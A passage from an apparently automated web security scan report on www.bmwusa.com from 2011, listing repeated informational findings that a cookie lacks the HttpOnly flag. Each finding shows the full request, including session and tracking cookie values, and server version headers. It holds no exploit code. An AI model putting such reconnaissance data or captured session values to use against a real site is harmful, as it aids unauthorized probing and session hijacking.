Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:49:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:09:37 GMT;path=/
Content-Length: 211572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.392. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:10:06 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:50:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:10:06 GMT;path=/
Content-Length: 202433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.393. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:09:43 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:49:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:09:43 GMT;path=/
Content-Length: 202434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.394. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35isportactivity/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:11:44 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35isportactivity/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:51:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:11:44 GMT;path=/
Content-Length: 214810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.395. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35isportactivity/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:06 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35isportactivity/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:53:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:06 GMT;path=/
Content-Length: 224590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.396. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35isportactivity/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:12:17 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35isportactivity/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:52:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:12:17 GMT;path=/
Content-Length: 212232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.397. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/x5seriessavmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35isportactivity/x5seriessavmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:12:20 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35isportactivity/x5seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:52:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:12:20 GMT;path=/
Content-Length: 202463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.398. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive50i/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:38 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive50i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:54:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:38 GMT;path=/
Content-Length: 214419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.399. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive50i/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:16:25 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive50i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:56:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:16:25 GMT;path=/
Content-Length: 223508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.400. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive50i/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:48 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive50i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:54:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:48 GMT;path=/
Content-Length: 213474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.401. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/x5seriessavmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive50i/x5seriessavmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:15:48 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive50i/x5seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:55:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:15:48 GMT;path=/
Content-Length: 202181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.402. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/activehybridx6/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:12 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:01:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:12 GMT;path=/
Content-Length: 212497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.403. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/activehybridx6/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:19:15 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:59:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:19:15 GMT;path=/
Content-Length: 212498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.404. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:07 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
